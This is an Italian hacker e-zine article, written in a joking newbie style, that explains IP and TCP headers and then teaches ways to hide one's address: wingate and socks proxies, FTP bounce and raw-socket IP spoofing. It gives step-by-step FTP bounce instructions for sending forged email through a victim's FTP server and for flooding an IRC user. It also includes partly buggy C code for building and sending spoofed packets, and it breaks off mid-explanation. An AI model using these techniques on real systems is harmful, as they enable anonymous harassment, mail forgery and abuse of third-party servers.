²°°°°°°°°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°°°°ÛÛÛÛ°°°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°²
²°°°°°°°°°ÛÛÛÛÛÛ°°°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°°°°°°°²
²°°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
NOTA BY N0bodY88 = come al solito questa sezione oltre ad articoli di hacking
vero e proprio contiene gli art piu' disparati sempre
attinenti all'argomento hacking quindi che dire ...
... godeteveli :) ... e se vi sembra che un art dica cose
sbagliate o cmq poco giuste e volete dircelo allora
scrivete voi un art sull'argomento cosi' da aiutarci a
migliorare sia noi membri di NewBies sia i lettori che
magari sull'argomento non ne sanno molto e vanno in cerca
di qualcuno che gli spieghi qualcosa o meglio che lo
indirizzi verso la strada giusta...
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
IL MIO IP? BOH!
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
------------<[Il mio IP? BOH!]>---------------------------------------------Autore: Mr_Skull
Consumo: 4 toast (faccio skifo), 7 pakketti di crackers (non di hackers),
5/6 preservativi (credete che noi newbies siamo sempre attaccati
al computer? Anche noi abbiamo altri piaceri, quindi, nei momenti
liberi fra una scrittura e l'altra mi diletto a lanciare gavettoni
a chi passa sotto il balcone... :)))
Musica ascoltata: (Get your gunn, Cake and Sodomy, Antichrist Superstar
Remix & Repent, I don't like the drugs, Sweet
Dreams, The Horrible People, The dope show,
Great Big White World, Mechanical Animals,
Rock is dead)-Marilyn Manson, Freak on a leash-Korn,
Narcotic-Liquido, Pretty Fly-offsping e Domenica e Luned•
di Branduardi.
Saluti: mR_bIs0n, ZeroCool, il BFi Staff (mitici, sempre cos•), il NewBies
staff (togliete per• gli articoli su bo e netbus :)) e Slurpzann,
nonch‚ un omaggio a Raoul Chiesa.
Fuck a: Telekom, il mio preside, la mia skuola (vi ho fottuto l'abbonamento),
Daniela (Marilyn Manson non fa skifo...(la musika, intendo)),
al gruppo del Timone e a chi mi ritiene malato di mente....
Barzelletta: Fidati, Š un prodotto Microsoft©.
------------------------Indice
0)
1)
2)
3)
4)
5)
6)
7)
8)
Disclaima
IP
TCP & UDP, protocolli
Gateways & socks firewalls
FTP Bounce
Spoofing
Sniffing
Hijacking
Conclusione
------------------------0) Disclaima
ATTENZIONE! NON MI ASSUMO UN CACCA DI RESPONSABILITA' PER L'USO CHE FARETE
DI QUESTE INFORMAZIONI, QUINDI, C@221 VOSTRI.
Inoltre, questo articolo Š scritto da un newbie per una rivista per newbies.
Se troverete scontate molte cose da me scritte, abbiate pazienza.
Per gli amici del gruppo "IL TIMONE": Queste informazioni mi sono state
rivelate dalla Sun Microsystems, che mi sta pagando per fare pubblicit…
anti-microsoft (WINDOWS NON CONOSCE I RAW). Inoltre ho scritto questo articolo
solo perch‚ Zero e Nobody mi hanno promesso una cospiqua sommetta in cambio.
per emailarmi: [email protected] (scherzo ovviamente...)
il mio sito web: www.fbi.gov (come sopra)
------------------------1) IP
Cos'Š un indirizzo ip? Bene, lo spiego velocemente perch‚ Š bello...
allora, avete mai visto quando inserite un sito (ad es. www.microsoft.com)
nel vostro browser preferito e premente invio uscire sulla barra dello stato:
[Ricerca del sito in corso]
[Sito web rilevato (o kualkosa di simile...)]
[Connessione a 201.31.26.66]
da bravi osservatori? Se no, MALE! :) allora, in questo kaso, ke kosa Š
201.31.26.66? Bene, Š quello l'indirizzo ip... Tutti i computerz in rete
hanno un indirizzo ip, anke voi! Infatti, il vostro provider (nota per
Eduardo Freni: proVider, e non proVVider, ma che lo leggi anche come
sta scritto????) vi assegna un indirizzo ip appena entrate, in modo che anche
voi possiate far parte della RETE.
Come Š fatto un indirizzo ip? Un indirizzo ip Š un numero a 32 bit suddiviso
in 4 blocchi da 8 (se prendiamo 255 in binario diventa 11111111, ma anche 0
da considerare un binario a 8 cifre, cioŠ 00000000, Š inutile che vi dica
che ogni cifra corrisponde ad un bit, vero??? :))separati da punti e che
spaziano da 0 a 255, ma approposito, i numeri 0 e 255 sono in genere
riservati, kuindi si pu• dedurre che vedremo numeri spaziare da 1 a 254...
Ora direte(?): ma come si fa da un indirizzo ip numerico a prendere il nome
del "proprietario" (il proprietario Š un server, ad es. 66.66.6.6 ->
i.am.an.all.american.antichrist) e viceversa?
Basta usare il DNS, ovvero il Domain Name Server, che da un ip numerico
ricava il nome dell'host e dal nome dell'host ricava l'ip numerico,
naturalmente dovete sapere almeno uno di questi due per farvi rivelare l'altro
(eheheh, elementare, Wazzon). Inoltre qualsiasi OS che io conosca, prende
l'ip 127.0.0.1 come proprio, quindi quando sul nukenabber esce: Un koglione
tenta di nukarti sula 139 dall'ip 127.0.0.1, beh, non rispondere al nuke: quel
coglione sei tu :) Ma come fa quello che ti nuka a cambiare il suo indirizzo
ip con quello locale di ognuno e con altri?
Vedremo pi— avanti, ora approfondiamo meglio il concetto di IP non come
indirizzo, ma come quello che Š: un INTERNET PROTOCOL.
Skemino:
0
15 16
31
ÉÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Í»
º 4 bit º 4 bit º 8 bit TOS
º 16 bit Total Lenght
º º
ºversion ºhead.lenºType of service º In bytes
º º
ÌÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º
16 bit
º3 bit º
14 bit
º º
º
Identification
ºflags º
fragment offset
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Ì 20
º 8 bit TTL
º 8 bit
º 16 bit
º ºbytes
º Time To Live
º protocol
º
Header Checksum
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º
32 bit
º º
º
Source IP Address
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º
32 bit
º º
º
Destination IP Address
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ͼ
º
Options
º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º
Data
º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Questo Š lo skemino dell'header IP, che si attakka come una sanguisuga su
qualsiasi pakketto ke voi mandiate...
Cercate di imparare bene codesto skemino (lo trovate dappertutto,
pure sul ricettario di nonna Amelia), vi sar… molto utile pi— avanti nella
vita (mai quanto le bombe di Jolly Roger :)
------------------------2) TCP e UDP, protocolli
Inizio kol dire ke il TCP e l'UDP sono i protocolli di rete pi— diffusi,
ma ne esistono anche altri (RAW su tutti: viva lo spoof!). Il TCP Š quello
usato da altri protocolli come HTTP, FTP, SMTP ecc ecc. mentre l'UDP Š
pi— usato nelle nuke (quelle che vi hanno fatto tanto bestemmiare su
Brufolo Bill©).
Bisogna dire ke senza TCP il protocollo TCP/IP rimarrebbe IP(ma va'?) e
kome tale diventerebbe inaffidabile, cioŠ:
io spedisko 20 pakketti ip contenenti un file frammentato ad un altro:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20
il protocollo IP non ricordando l'ordine in cui i pacchetti sono stati
spediti, facendo arrivare magari cos•:
17 2 20 1 6 10 16 19 8 3 7 13 18 15 4 11 5 9 12 14
o magari
1 5 6 20
Beh? E allora quello kome fa a sapere qual Š il primo pacchetto inviato e
quale l'ultimo? O peggio... Š arrivato il pakketto?
Non pu• funzionare un ftp cos•!
Ma se noi attakkassimo un pakketto tcp ad un header ip???
Ecco l'header TCP (AAARGH! UN'ALTRA TABELLA!!!):
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» Í»
º
16 bit
º
16 bit
º º
º
Source Port Number
º
Destination Port Number
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º
32 bit
º º
º
SEQence Number
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º
32 bit
º Ì 20
º
ACKnowledgement Number
º ºbytes
ÌÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º4 bit
º 6 bit
º
6 bit
º
16 bit
º º
ºHead.Lenº Reserved
º
Flags
º
Window size
º º
ÌÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ º
º
16 bit
º
16 bit
º º
º
Checksum
º
Urgent pointer
º º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ ͼ
º
Options
º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹
º
Data
º
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
Bene, combinato all'ip dovremmo avere:
min. 20 bytes di header IP + min. 20 bytes di header TCP + data, ma bisogna
considerare che un pacchetto TCP/IP non pu• superare la soglia dei 65535 bytes
(vi ricordate il Ping Of Death???).
Ora, torniamo al problema dell'ordine dei pakketti: avete visto quel sequence
number (ho evidenziato SEQ perch‚ in molti sniffer Š per brevit… cos•
mostrato, poi vedremo pi— avanti)? Bene, con il sequence number il ricevente
sapr… benissimo quale pakketto viene prima e quale dopo.
L'ACK Š in vece il riconoscimento, ed Š dato dal precedente SEQ del ricevente
+ il numero di bytes che questi ha inviato, mentre il SEQ Š il precedente ACK
del ricevente... ke kasino, vero? Comunque vi ci abituerete... (io ancora non
mi ci sono abituato).
Bene, il discorso kambia quando si stabilisce una connessione.
Chiamiamo un client A, un server B:
A--->B SEQ:1118358509 ACK:0
B--->A SEQ:4143819233 ACK:1118358510
A--->B SEQ:1118358510 ACK:4143819234
(NUMERI PRESI DALL'ARTICOLO DI FuSyS, Progetto 0N0S3NDAi, BFi no.4 :))
Questo processo Š chiamato 3-Way Handshake, A manda un SEQ a B, ACK
naturalmente 0, B risponde con un suo SEQ e con l'ACK di A incrementato di 1,
ed A per confermare risponde con come SEQ l'ACK di B, e come ACK il SEQ di B+
1, tutto chiaro? (a me no...)
E da qui inizia la comunicazione.
Per il protocollo UDP, kambia kualkosa...
Il protocollo UDP infatti non stabilisce di una connessione, come il TCP,
ha un header pi— pikkolo ed Š leggermente pi— veloce...
Volete un'altra tabella? Mi dispiace, ma momentaneamente non dispongo di
schemi di pacchetti UDP, cos• cercher• di riassumere testualmente.
Un pacchetto UDP Š cos• composto: 16 bit source port, destination port,
16 per header lenght + reserved + flags e 16 per il checksum.
NB: per i bit mi sono basato sul fatto che erano shorts, il che vuol dire
intero a 16 bit, da 0000 a FFFF (0 a 65535) (il numero massimo di porte), il
checksum Š di 16 sicuramente, mentre non sono sicuro per la lunghezza: Š solo
quella dello header o Š di tutto il pacchetto??? Dovrebbe essere a 16 bit,
essendo uno short, ma negli altri protocolli l'header lenght Š di 4...
Vabb‚, nel prossimo numero cercher• di mandarvi la risposta... 8(
Ora, tralasciando l'UDP (se non volete spoofare per nukare kualkuno non ve ne
importer… pi— di tanto), sappiamo che il Source Address (indirizzo sorgente)
Š nell'intestazione IP, mentre la Source Port Š nella TCP giusto?
Vedremo pi— avanti (vedi SPOOFING) come si mandano pacchetti spoofati.
Ed ora, se non volete che nessuno sappia il vostro vero IP su IRC, ecco i...
------------------------3) Gateways & socks firewalls
Cosa Š un gateway? Qualcuno sul numero 3 di Newbies aveva detto:
Mettiamo che Gambadilegno voglia insultare Topolino, senza per• fargli sapere
di essere stato lui, cosa fa?
Va da Pippo (il pi— scemo) e gli dice: senti, vai da Topolino e digli:
"@'^!##" (o qualcosa di simile (non ricordo)) e dimmi cosa ti risponde.
Allora Pippo, che Š molto idiota, va da Topolino e gli dice:
"@'^!##" (rimango nell'incertezza tuttora).
Topolino allora gli risponde:
"Senti Pippo, io sono sempre molto calmo e tranquillo, ma se mi dici queste
cose alla fine mi farai arrabbiare..."
Pippo, che non ha capito nemmeno cosa ha detto Topolino, torna da Gambadilegno
e gli dice (per emulazione dei suoni) quello che gli ha detto Topolino.
Vedete, prendiamo come Gambadilegno il client A, come Pippo un server dotato
di wingate, chiamato B, e come Topolino un altro server, magari
tin.it, tale C.
Allora, una volta che A si connette a B (in genere sulla 8080), si trover…
davanti il prompt:
Wingate>
Che pu• fare? Vi konnettete da qui ad un altro server e l'ip loggato sar…
quello del wingate o netgate (o stargate ;)) che dir si voglia...
Un socks invece firewall come si usa? Il firewall Š usato in genere per
connettersi ad IRC da un ip non proprio (pi— o meno per lo stesso skopo dei
gateways...) e mandare a 'ffanculo tutti coloro che tenteranno di nukare un
server... Per utilizzarlo prendiamo il nostro klient IRC di fiducia (mIRC,
usato dalla maggioranza), andiamo ad Options->Firewall e selezioniamo "Use
socks Firewall" come host ci mettiamo il Server B e come socks va bene anche
il 4, port la porta, et ual… (oddio...), il gheim est fatto (sono un
poliglotta), nel senso che potete benissimo clickare su Connect, e i vostri
messaggi "rimbalzeranno" prima sul server B e poi arriveranno a C, quindi,
se uno vi fa un DNS, al massimo vi fotte il firewall ;)
Come avrete intuito (spero, altrimenti ve lo spiego io), il passaggio pi—
difficile Š TROVARE il server B. Esistono appositi scanner per Wingate,
mentre se volete un firewall e se proprio non volete perdere tempo andate su
un canale warez o per pedofili (maledetti!) & co., vedete le mask degli users,
e almeno uno di essi sar… un paranoico che per non essere bekkato entra in
quei canali usando un firewall... Chiaro il concetto????
Bene, ora vedremo come fare altri skerzetti di questo tipo con una tecnica
"rivelatami dalla Sun" ( :))) detta...
------------------------4) FTP Bounce
Bene, sapete tutti cosa Š un ftp, vero? Occorre dire (almeno ad alcuni non
proprio bravi con l'inglese) che bounce vuol dire "rimbalzo". Rimbalzo FTP?
Cos'Š, si mangia? No. Avete un ftp uploadabile? EHEHEH, SAPETE COME SI
RITIRANO I FILES? Vabb‚, iniziamo dall'inizio (urka...)
Quando un ftp trasmette un file ad un computer remoto, lo fa in base all'ip
e alla porta specificata previamente. Non avete mai visto un client ftp in
funzione? (se no, perch‚ cavolo leggete questo articolo??? :)) Se Š un client
munito di status-bar o ke vi fa vedere i comandi, quando ritirerete un file
vedrete: PORT xxx,xxx,xxx,xxx,y,z dove le x sono il vostro indirizzo IP
(intervallato per• da ',' e non da '.'), mentre la y Š un numero che non ci
interessa, e la z Š la porta sulla quale il client si appresta a ricevere il
file. Dopodicch‚ vedrete il comando RETR xxxxxxxx dove xxxxxxxx Š il nome del
file che volete ritirare.
Il comando PORT serve a dire al server a quale host:porta deve sendare il
file, ed il client ftp lo usa per dare il nostro ip e la nostra porta.
Ma se noi usassimo ad esempio:
PORT 111,222,33,44,0,21
RETR Goofyfuckedbymickey.jpg
che accadrebbe???? Semplice, il server ftp anzikk‚ mandare a noi il file, lo
manda all'host 111.222.33.44 sulla porta 21 (ftp, ma si possono usare anche
altre porte), cos• il file Goofyfuckedbymickey.jpg (eheheh, come mi Š venuto
'sto nome???) verr… copiato anche sull'ftp 111.222.33.44 (certi files sono
imperdibili :) ) (anzi, non verr… copiato perch‚ ci vuole user e pass e stor
ecc...).
Se siete abbastanza makkinosi avrete gi… capito quali siano le cosette che si
possono fare con questo stratagemma. Comunque, continuate a leggere.
Se voleste mandare una fakemail a qualcuno (suppongo che sappiate come si
faccia, ma in caso contrario i comandi sono commentati) senza che il vostro
ip compaia minimamente nella suddetta, bene, allora potete fare cos•:
create un nuovo file contenente i comandi per l'SMTP (server che invia posta),
ad esempio:
HELO ftpvittima.com
[saluta l'SMTP identificandosi come il
server che usate per bounciare]
MAIL FROM: <[email protected]>
[imposta l'indirizzo mail mittente
come quello che ci mettete fra le <>]
RCPT TO: <[email protected]>
[indirizzo del ricevente]
DATA
[inizio del corpo della mail]
[tutte le cose che ci vanno, gli headers, ecc.]
Muori lamerone!
.
[un punto su riga vuota termina il
data]
QUIT
[quitta dall'smtp]
bene, ed ora in teoria si potrebbe mandare all'smtp via bounce, ma Š di regola
incrementare le dimensioni del file a circa 60 kilobytes, per non far cadere
inspiegabilmente la connessione...
per fare ci• editate un file contenente 60000 spazi (provateci...) oppure
utilizzate il debug in questo modo:
[NOI] C:\>debug nomedelfileconi60000spazi
[PC] File non trovato
[NOI] -f 100,F000,0
[NOI] -rcx
[PC] :0000
[NOI] -EA60
[NOI] -w
[PC] Scrittura di EA60 bytes in corso...
[NOI] -q
bene, dovremmo aver creato un file chiamato nomedelfileconi60000spazi lungo
all'incirca 60k e pieno di " " (spazi).
ora si fa un copy /b filedeicomandi+nomedelfileconi60000spazi cmds
et voil…! Ecco il file cmds lungo 60k ma con i comandi all'interno.
Ed ora, come utilizzare questo file???
1) Prendete il vostro client ftp preferito e mettete sul server vittima il
file "cmds" o come l'avete chiamato (naturalmente il server deve essere
uploadabile...)
2) Prendete il vostro client telnet preferito e connettetevi al server vittima
sulla porta 21 (ftp).
3) Ora scrivete PORT xxx,xxx,xxx,xxx,0,25 (le x sono l'indirizzo ip del server
mail, se non lo sapete allora fate un DNS, mentre 25 Š per SMTP, lo 0 lo
lasciate cos•)
4) Ed infine RETR cmds (fa inviare all'ftp il file cmds all'indirizo e alla
porta specificate con PORT)
Che succede? L'ftp si connette al server SMTP e gli inizia a mandare il file
cmds e l'smtp prende i caratteri ascii esattamente come se fosse un telnet o
un client per e-mail ad inviarli. Volete un altro esempio???
Editate un file contenente:
USER Pippo
NICK Pippo
PRIVMSG Topolino :@'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!## @'^!##
L'ultima riga dovete ripeterla pi— volte... Oppure se conoscete bene i comandi
IRC potete fare molte altre cosette, questa serve solo a far dire a Topolino
la parola @'^!## ripetutamente da Pippo, che Š il nostro ftp di fiducia :)
Nulla ci vieta di floodarlo di DCC o di mandargli ping in continuazione...
Per• fate 'ste cose solo in casi veramente necessari
Comunque, aggiungete i soliti 60k, inviate al server e con il solito
procedimento (PORT 194,243,155,43,0,6666 per connettervi a irc.tin.it sulla
6666 e poi RETR nomedelfileconicomandi) e tutto funzioner… (se non avete
sbagliato niente o se non ho sbagliato niente io .. :P).
NOTA IMPORTANTISSIMA LEGGETELA:
In alcuni casi pu• essere meglio utilizzare il comando:
quote "port xxx,xxx,xxx,xxx,y,z"
invece di PORT solamente. Vi ho avvisati, chiaro?????
Ok, ok, bello sto ftp bounce, ma come cacca si fa a vedere le risposte? Non si
pu•, l'ftp Š quel che si pu• definire un attacco cieco. Ma ora vediamo lo...
------------------------5) Spoofing
Lo spoofing Š una tecnica che ci permette di inviare pacchetti di qualsiasi
genere che sembrano provenire da un determinato indirizzo quando invece
vengono da tuttaltra parte... Provate a nukare qualke rompikollo dall'ip di
fbi.gov (eheheh). Comunque non voglio trattare di nukes et similia, ma
cercher• di illustrarvi i diversi tipi di attacco spoofato.
Ci sono due tipi di attacchi: quelli "ciechi" e quelli che ci permettono di
vedere le risposte, "sniffando" dal server vittima all'ip che usiamo per
spofare.
Come si fa a mandare un pacchetto spoofato?
Beh, ci sono modi e modi. Da Unix & Company Š molto facile: basta creare un
socket RAW (un socket *molto* grezzo) e lavorarlo mettendoci sopra degli
header IP e TCP (ma anche UDP o ICMP) non standard, cioŠ come quelli che si
trovano nelle librerie net*. Infatti, nel nostro header IP dovremmo mettere
anche l'ip del mittente, cosa che invece con le normali funzioni di sending
viene automaticamente fatta dal protocollo usato.
In principio si crea un bell'header ip tipo:
struct ipheader {
unsigned char verlen, tos; //versione+lunghezza header, tipo
unsigned short lenght, identification, flageoffset; //lunghezza, id,
flags+offset
unsigned char ttl, protocol; //time to live, protocollo utilizzato
unsigned long int source, destination; //indirizzo ip sorgente, destinazione
};
ecco, bello vero?
Se esaminate attentamente vedrete:
* un char (8 bit) che include sia la versione ip che la lunghezza dello
header (contenitori a 4 bit non li so trovare io in c...)
* un char (8 bit) per il tipo di servizio (TOS)
* uno short (16 bit) per la lunghezza, uno per l'identificazione e uno
che include i 3 bit dei flag e i 13 del fragment offset
* un altro char per il time to live, ovvero su quanti server pu• passare
prima di fermarsi
* un altro char che identifica il protocollo
* due long (32 bit) che identificano l'ip sorgente e quello di destinazione
bene, non Š uguale allo skemino del cap. 1?
Per agevolarci ora creeremo uno pseudo ip header:
struct pseudoipheader {
unsigned long int source, destination;
char byte_zero, protocol;
unsigned short TCP_UDP_lenght;
};
qui abbiamo l'ip sorgente, destinazione, il byte zero, il protocollo
utilizzato e la lunghezza del tcp o dell'udp.
Ora veniamo ai protocolli TCP e UDP:
struct tcpheader {
unsigned short source, destination;
unsigned long int seq, ack;
unsigned short offset_flags, window, checksum, urgent;
};
da notare che i source e i destination sono non degli indirizzi, ma delle
porte (short a 16 bit), qui dovete mettere la porta sorgente e quella
destinazione, insomma. Poi c'Š il SEQ e l'ACK, interi a 32 bit, e infine
abbiamo l'header lenght + reserved + flags, window, il checksum e l'urgent
pointer.
Ecco qui anche quello dell'udp, giusto per facilitarvi la vita :)
struct udpheader
unsigned short
}
Tutto chiaro no?
anche questo per
{
source, destination, lenght, checksum;
E per finire si crea uno struct di scambio di dati spoofati,
facilitarci la vita...
struct spdataexchange {
int fd;
char *data;
int datalen;
char *source;
unsigned short sourceport;
char *destination;
unsigned short destinationport;
unsigned long seq, ack;
unsigned short flags;
char *buffer;
int ip_optlen, tcp_optlen;
}
In questo struct copieremo i dati ip e tcp e tutto il resto, per poi scriverlo
sul pacchetto da inviare...
Ora, come facciamo ad inviare un pacchetto??? Creeremo una funzione detta
sendsppacket:
void sendsppacket(struc spdataexchange *sp, unsigned char protcollo)
{
int sp_status;
struct sockaddr_in *sp_serv;
struct hostent *sp_help;
int HEADER_BASE;
bzero((char *)&sp_serv, sizeof(struct sockaddr));
sp_serv.sin_family = AF_INET;
sp_serv.sin_addr.s_addr = inet_addr(sp->destination);
if(sp_serv.sin_addr.s_addr==(unsigned int)-1)
{
if(!(sp_help=gethostbyname(sp->destination)))
fprintf(stderr,"unknown host %s\n",sp->destination), exit(1);
bcopy(sp_help->h_addr,(caddr_t)&sp_serv.sin_addr,sp_help->h_lenght);
}
switch(protocollo)
{
case TCP: HEADER_BASE = TCP_HEADER_BASE; break; //Spiego sotto questi
passaggi
case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
case default: exit(1); break;
}
sp_status = sendto(sp->fd, (char *)sp->buffer, sp->datalen+HEADER_BASE+
IP_HEADER_BASE+sp->ip_optlen, 0, (struct sockaddr
*)&sp_serv,
sizeof(struct sockaddr));
if((sp_status < 0) ||
(sp_status!=sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen))
{
if(sp_status < 0)
perror("sendto()\n"), exit(1);
printf("Trasmessi soltanto %d bytes di %d\n", sp_stat,
sp->datalen+HEADER_BASE+IP_HEADER_BASE+sp->ip_optlen);
}
}
Bene, con questa funzione mandiamo i pacchetti che abbiamo creato... Dopo i
procedimenti di routine si tenta di risolvere l'host di destinazione, se non
si riesce si esce (splendido gioco di parole...), se invece l'host esiste
si copia nel "sp_serv.sin_addr". Poi si vede il protocollo: TCP e UDP ve li
definite prima con #define (TCP 6 e UDP 17), se Š tcp l'header_base sar…
ovviamente la lunghezza della dimensione minima dell'header tcp(20), se Š udp
quella dell'udp (8) e se Š altro esce :), l'ip Š 20. Poi si manda il pacchetto
spoofato realizzato prima, e si vede se il risultato Š positivo o meno, quanti
bytes sono stati inviati, eccetera. La lunghezza naturalmente Š la lunghezza
dei dati+l'HEADER_BASE definito prima+la lunghezza dell'header ip (20) + la
lunghezza delle opzioni ip. 500 righe! Uff! Che fatica... Dovremmo esserci...
Per fixare i vostri header IP e TCP, ci sono due pratiche(ALLA FACCIA!)
funzioni:
void sp_fix_IP_packet(struct spdataexchange *sp, unsigned char protocollo)
{
struct ipheader *sp_help_ip;
int HEADER_BASE;
switch(protocollo)
{
case TCP: HEADER_BASE = TCP_HEADER_BASE; break;
case UDP: HEADER_BASE = UDP_HEADER_BASE; break;
case default: exit(1); break;
}
sp_help_ip = (struct ipheader *)sp->buffer;
sp_help_ip->verlen = (IP_VERSION << 4) |
(IP_HEADER_BASE+sp->ip_optlen+sp->tcp_optlen);
sp_help_ip->tos = 0;
sp_help_ip->lenght =
htons(IP_HEADER_BASE+HEADER_BASE+sp->ip_optlen+sp->tcp_optlen+sp->datalen);
sp_help_ip->ID = htons(12545);
sp_help_ip->flageoffset=0;
sp_help_ip->ttl = 69; //miseria! Non deve morire prima del previsto...
sp_help_ip->protocol = protocollo;
sp_help_ip->source = sp_getaddrbyname(sp->source);
sp_help_ip->destination = sp_getaddrbyname(sp->destination);
sp_help_ip->checksum = in_cksum((unsigned short *) (sp->buffer),
IP_HEADER_BASE+sp->ip_optlen);
}
Questa Š per l'ip... Š molto intuitiva, Š inutile che ve la spieghi.
Attenzione, la funzione sp_getaddrbyname(char *) non ve la scrivo, ve la
spiego brevemente:
usate un HOSTENT, nel caso in cui l'host debba andare risolto. Se
l'host Š gi… numerico, si verifica l'esistenza e si ritorna il valore long
